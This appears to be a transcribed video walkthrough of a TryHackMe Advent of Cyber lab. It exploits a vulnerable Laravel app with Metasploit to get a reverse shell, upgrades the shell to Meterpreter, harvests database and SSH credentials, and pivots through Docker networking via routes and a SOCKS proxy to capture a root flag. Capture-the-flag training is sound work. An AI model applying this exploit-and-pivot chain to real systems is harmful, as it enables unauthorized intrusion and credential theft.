This is day 9 of Advent of Cyber, and the challenge is called Docker the Halls. So this challenge involves both Docker and Metasploit. Docker is a way to package applications and the associated dependencies into a single unit called an image. This image can be shared and ran as a container, either locally as a developer or remotely on a production server. Sander's web application and database are running in Docker containers, but only the web application is directly available via an exposed port. A common way to tell if a compromised application is running in a Docker container is to verify the existence of a /docker-n file at the root directory of the file system. So what is Metasploit? Metasploit is a powerful penetration testing tool for gaining initial access to systems, performing post-exploitation, and pivoting to other applications and systems. So after successfully exploiting a remote target with a Metasploit module, a session is often opened by default. These sessions are often command shells or Meterpreter sessions, which allow for executing codes against the target. It's also possible to open up other session types in Metasploit, such as SSH or WinRM, which do not require payloads. So what is Meterpreter? Meterpreter is an advanced payload that provides interactive access to a compromised system. Meterpreter supports running commands on a remote target, including uploading, downloading files, and pivoting. So pivoting is once an attacker gains initial access into a system, the compromised machine may be used to send additional web traffic through, allowing previously inaccessible machines to be reached. For example, an initial foothold could be gained through a web application running in a Docker container or through an exposed port on a Windows machine. This system will become the attack launchpad for other systems in the network. We can route through network traffic through the compromised machine to run network scanning tools such as Nmap or ARP to find additional machines and services which were previously inaccessible to the pentester. This concept is called network pivoting. So we have the pentester here who gains access to the compromised container, and now with access to this container, they can go to this container or this machine. Okay, so we'll get started. Okay, so let's get started with the challenge. So we've got our VM deployed. Now it wants us to run mmap against it. So mmap-t4-A-pn 10.10.124.247. So we can see at the top here, port 80 is open. So, and it's saying it's running an Apache web server. So let's go to the web browser and let's access this host. So you've got a web page here running Laravel version 8.26.1. Okay, so now it wants us to go to our terminal and it wants us to run msf console to access Metasploitable. Okay, it now wants us to use the exploit called multi/php/ignition_Laravel debug remote code execution. So to see the options that we need to do, we can do show options. We can see that we need to put in the host of the remote host and then our local host. So for set our host, we can do 10.10.124.247. And then for our host, we need to figure out what our IP address is, which is this number. So we'll show option again. We will set our host to our IP address. So with that set up, we can now do run. It says the target appears to be vulnerable, and we now have a shell open. It says here the open shell will be a basic cmd/unix/reverse bash shell, which is running here. We can type in the command who am I to figure out who we are. We are www-data. So we want to now upgrade our session, so we'll type the command background to put this session into the background and return to the Metasploitable console. So it wants us to upgrade the session, so sessions-u-1. And we have now upgraded the session. So now type sessions-i-1 to access Meterpreter. We will now be listing what is in the .env file and this directory. We can see it has a whole heap of information about the services running, such as we can see the database names Postgres, the database uses Postgres, and the password Postgres. So what I want us to do now is resolve the web service database IP address, which we can see is this IP address here. Now that we have that IP address, it wants us to go back to the console and add this IP address as a route. So route add this. Oh, my bad. -1. So that's now been added to that session. Well, it's saying we're meant to be able to find Docker env file, but can't find that. So anyway, we'll go back to the Metasploit console and we will add route add 172.17.0.1 subnet 32 to session 1. So we'll route print just to see if it's all good. Okay, I think I actually added this one in incorrectly. Well, yeah, I put my own one in there. Let's quickly remove that. Route remove 10.10.3cx138 from 1. Okay, remove that. Now we need to go back in and find the actual one. Okay, now we've added the correct route, so we will do route print just to verify. There we go, that's the correct IP. So we'll first use auxiliary scanner postgres /postgres underscore schema dump. Oh, must have spelled something wrong. 1s in Postgres. We will now run against Postgres /postgres username password of Postgres at 172.28.101.51 Postgres. So we've got the schema of the database here. So if we want to select information from a specific table, we can use auxiliary admin /postgres underscore SQL. And then we can do run postgres at 172.28.101.51 /postgres, and we can do SQL equals select from users. We found the user called Santa with a password of this in the database. So before we go further, let's just quickly answer the questions which we've done so far. So, what ports are open? Port 80 is open. The web application is developed with Laravel. What CVE is it vulnerable to? Let's go to our web browser, search for CVEs for this. Let's see if that CVE is correct. Okay, it is. What command can we use to upgrade? So that's sessions-u1. What file indicates a session has been opened with a Docker container size? That's /.dockerenv. What file often contains useful credentials? That is .env. What database table contains useful credentials? That is users. Santa's password is P4$W0RD. Okay, so now we can carry on with this. So to further pivot through the private network, we can create a SOCKS proxy within Metasploit. So we'll do use auxiliary server SOCKS underscore proxy. We will run this. Oh, my bad, I just noticed this part here. I think we need to clear that. So run srv host equals 127.0.0.1 server port equals 9050 and version equals 4a. Okay, that looks correct now. So let's return back to this terminal. And now let's try rerun it. Okay, cool. That seemed to have worked. So now let's use proxy change -q nmap nst pnp 2080.443.5432, and this will be against 127.17.0.1. Yeah, we can see it's running all those ports. More importantly, that port 22 is open for SSH. So we'll return to Metasploit. We will use auxiliary scanner SSH login. We will then do run SSH : so that was Santa $P4 $word at 172.17.0.1. Okay, so that scan has worked. So let's see what sessions we have available. So we'll go back to our sessions-i-1. So now that we're connected, we can do ls-root. Then we can do cat root.txt, and there's our flag. Okay, so we need to go back to what ports are open on the host machine. Okay, I guess 22-80. Okay, well that was correct. Yep, so that is now day 9 complete. So if you like this video, make sure to like and subscribe.